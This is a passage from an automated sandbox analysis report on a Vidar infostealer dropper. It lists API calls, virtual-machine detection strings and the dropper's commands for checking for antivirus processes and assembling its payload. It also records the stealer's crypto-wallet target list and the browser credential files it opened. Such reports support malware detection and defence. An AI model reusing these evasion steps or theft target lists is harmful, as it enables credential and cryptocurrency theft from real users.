                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.comCode function: 16_2_00F6DC54 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,16_2_00F6DC54
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.comCode function: 16_2_00F7A087 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,16_2_00F7A087
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.comCode function: 16_2_00F7A1E2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,16_2_00F7A1E2
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.comCode function: 16_2_00F6E472 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,16_2_00F6E472
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.comCode function: 16_2_00F7A570 FindFirstFileW,Sleep,FindNextFileW,FindClose,16_2_00F7A570
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.comCode function: 16_2_00F766DC FindFirstFileW,FindNextFileW,FindClose,16_2_00F766DC
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.comCode function: 16_2_00F3C622 FindFirstFileExW,16_2_00F3C622
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.comCode function: 16_2_00F773D4 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,16_2_00F773D4
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.comCode function: 16_2_00F77333 FindFirstFileW,FindClose,16_2_00F77333
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.comCode function: 16_2_00F6D921 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,16_2_00F6D921
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.comCode function: 16_2_00F05FC8 GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,16_2_00F05FC8
                Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user~1\Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user~1\AppData\Local\Temp\322891Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user~1\AppData\Local\Temp\Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user~1\AppData\Local\Temp\322891\Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user~1\AppData\Local\Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user~1\AppData\Jump to behavior
                Source: chrome.exe, 00000015.00000002.1890092613.000036EC00B2C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware
                Source: 3OHLNY.16.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
                Source: 3OHLNY.16.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
                Source: 3OHLNY.16.drBinary or memory string: Canara Transaction PasswordVMware20,11696492231}
                Source: 3OHLNY.16.drBinary or memory string: interactivebrokers.co.inVMware20,11696492231d
                Source: 3OHLNY.16.drBinary or memory string: netportal.hdfcbank.comVMware20,11696492231
                Source: 3OHLNY.16.drBinary or memory string: outlook.office.comVMware20,11696492231s
                Source: 3OHLNY.16.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
                Source: 3OHLNY.16.drBinary or memory string: AMC password management pageVMware20,11696492231
                Source: 3OHLNY.16.drBinary or memory string: interactivebrokers.comVMware20,11696492231
                Source: 3OHLNY.16.drBinary or memory string: microsoft.visualstudio.comVMware20,11696492231x
                Source: Centered.com, 00000010.00000002.2503014570.0000000001A2E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: chrome.exe, 00000015.00000002.1887973658.000036EC0060C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware Virtual USB Mouse=Validator
                Source: msedge.exe, 0000001A.00000003.1943238674.000033FC00324000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware20,1(
                Source: 3OHLNY.16.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
                Source: 3OHLNY.16.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
                Source: 3OHLNY.16.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696492231
                Source: 3OHLNY.16.drBinary or memory string: outlook.office365.comVMware20,11696492231t
                Source: 3OHLNY.16.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
                Source: 3OHLNY.16.drBinary or memory string: discord.comVMware20,11696492231f
                Source: Centered.com, 00000010.00000002.2503014570.0000000001A2E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWRZ/
                Source: chrome.exe, 00000015.00000002.1882634460.000002AE0D2EC000.00000004.00000020.00020000.00000000.sdmp, msedge.exe, 0000001A.00000002.2008867656.00000180E5C43000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: 3OHLNY.16.drBinary or memory string: global block list test formVMware20,11696492231
                Source: 3OHLNY.16.drBinary or memory string: dev.azure.comVMware20,11696492231j
                Source: 3OHLNY.16.drBinary or memory string: www.interactivebrokers.comVMware20,11696492231}
                Source: 3OHLNY.16.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
                Source: 3OHLNY.16.drBinary or memory string: bankofamerica.comVMware20,11696492231x
                Source: 3OHLNY.16.drBinary or memory string: trackpan.utiitsl.comVMware20,11696492231h
                Source: 3OHLNY.16.drBinary or memory string: tasks.office.comVMware20,11696492231o
                Source: 3OHLNY.16.drBinary or memory string: account.microsoft.com/profileVMware20,11696492231u
                Source: 3OHLNY.16.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696492231
                Source: 3OHLNY.16.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
                Source: 3OHLNY.16.drBinary or memory string: ms.portal.azure.comVMware20,11696492231
                Source: Centered.com, 00000010.00000002.2503014570.0000000001995000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW $
                Source: 3OHLNY.16.drBinary or memory string: turbotax.intuit.comVMware20,11696492231t
                Source: 3OHLNY.16.drBinary or memory string: secure.bankofamerica.comVMware20,11696492231|UE
                Source: 3OHLNY.16.drBinary or memory string: Canara Transaction PasswordVMware20,11696492231x
                Source: chrome.exe, 00000015.00000002.1889850838.000036EC00A88000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: USB device added: path=\\?\usb#vid_0e0f&pid_0003#5&2dda038&0&5#{a5dcbf10-6530-11d2-901f-00c04fb951ed} vendor=3599 "VMware", product=3 "VMware Virtual USB Mouse", serial="", driver="usbccgp", guid=d5a0afca-8509-4b16-a2b8-6b1a28d6e6bb
                Source: 3OHLNY.16.drBinary or memory string: Interactive Brokers - HKVMware20,11696492231]
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.comProcess information queried: ProcessInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.comCode function: 16_2_00F7F4FF BlockInput,16_2_00F7F4FF
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.comCode function: 16_2_00F0338B GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,16_2_00F0338B
                Source: C:\Users\user\Desktop\din.exeCode function: 0_2_00406328 GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_00406328
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.comCode function: 16_2_00F25058 mov eax, dword ptr fs:[00000030h]16_2_00F25058
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.comCode function: 16_2_00F620AA GetLengthSid,GetProcessHeap,HeapAlloc,CopySid,GetProcessHeap,HeapFree,16_2_00F620AA
                Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.comCode function: 16_2_00F32992 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,16_2_00F32992
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.comCode function: 16_2_00F20BAF IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,16_2_00F20BAF
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.comCode function: 16_2_00F20D45 SetUnhandledExceptionFilter,16_2_00F20D45
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.comCode function: 16_2_00F20F91 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,16_2_00F20F91

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Yara detected Powershell download and execute
                Source: Yara matchFile source: Process Memory Space: Centered.com PID: 7244, type: MEMORYSTR
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.comCode function: 16_2_00F61B4D LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,16_2_00F61B4D
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.comCode function: 16_2_00F0338B GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,16_2_00F0338B
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.comCode function: 16_2_00F6BBED SendInput,keybd_event,16_2_00F6BBED
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.comCode function: 16_2_00F6ECD0 mouse_event,16_2_00F6ECD0
                Source: C:\Users\user\Desktop\din.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Appreciated Appreciated.cmd & Appreciated.cmdJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa" Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 322891Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 322891Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Gc + ..\Large + ..\Rights + ..\Becomes IJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\322891\Centered.com Centered.com IJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.comCode function: 16_2_00F614AE GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,16_2_00F614AE
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.comCode function: 16_2_00F61FB0 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,16_2_00F61FB0
                Source: Centered.com, 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmp, Centered.com.2.dr, Durable.0.drBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
                Source: Centered.comBinary or memory string: Shell_TrayWnd
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.comCode function: 16_2_00F20A08 cpuid 16_2_00F20A08
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.comQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.comQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.comCode function: 16_2_00F5E5F4 GetLocalTime,16_2_00F5E5F4
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.comCode function: 16_2_00F5E652 GetUserNameW,16_2_00F5E652
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.comCode function: 16_2_00F3BCD2 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,16_2_00F3BCD2
                Source: C:\Users\user\Desktop\din.exeCode function: 0_2_00406831 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,0_2_00406831

                Stealing of Sensitive Information

                barindex
                Yara detected Vidar stealer
                Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                Source: Yara matchFile source: 16.2.Centered.com.49c0000.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000010.00000002.2505513959.00000000049C1000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000010.00000002.2503014570.0000000001995000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000010.00000003.1613569602.0000000001A2D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000010.00000003.1613510624.00000000049CD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000010.00000002.2504659598.00000000048C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: Centered.com PID: 7244, type: MEMORYSTR
                Found many strings related to Crypto-Wallets (likely being stolen)
                Source: Centered.com, 00000010.00000002.2498840791.00000000013B4000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: *electrum*.*
                Source: Centered.com, 00000010.00000002.2505513959.0000000004B6C000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                Source: Centered.com, 00000010.00000002.2505513959.0000000004B6C000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: \Electrum\wallets\
                Source: Centered.com, 00000010.00000002.2505513959.0000000004B6C000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: window-state.json
                Source: Centered.com, 00000010.00000002.2505513959.0000000004B6C000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: exodus.conf.json
                Source: Centered.com, 00000010.00000002.2505513959.0000000004B6C000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                Source: Centered.com, 00000010.00000002.2505513959.0000000004B6C000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                Source: Centered.com, 00000010.00000002.2505513959.0000000004B6C000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: ElectrumLTC
                Source: Centered.com, 00000010.00000002.2505513959.0000000004B6C000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: passphrase.json
                Source: Centered.com, 00000010.00000002.2505513959.0000000004B6C000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: \Ethereum\
                Source: Centered.com, 00000010.00000002.2498840791.00000000013B4000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: *exodus*.*
                Source: Centered.com, 00000010.00000002.2498840791.00000000013B4000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: *ethereum*.*
                Source: Centered.com, 00000010.00000002.2505513959.0000000004B6C000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                Source: Centered.com, 00000010.00000002.2505513959.0000000004B6C000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                Source: Centered.com, 00000010.00000002.2505513959.0000000004B6C000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                Source: Centered.com, 00000010.00000002.2505513959.0000000004B6C000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                Source: Centered.com, 00000010.00000002.2505513959.0000000004B6C000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: keystore
                Source: Centered.com, 00000010.00000002.2505513959.0000000004B6C000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: \Electrum-LTC\wallets\
                Tries to harvest and steal browser information (history, passwords, etc)
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\2918063365piupsah.files\key4.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\minidumps\key4.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\temporary\key4.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\key4.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.files\key4.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\crashes\key4.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.files\key4.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\default\key4.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\to-be-removed\key4.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\places.sqliteJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\archived\2023-10\key4.dbJump to behavior
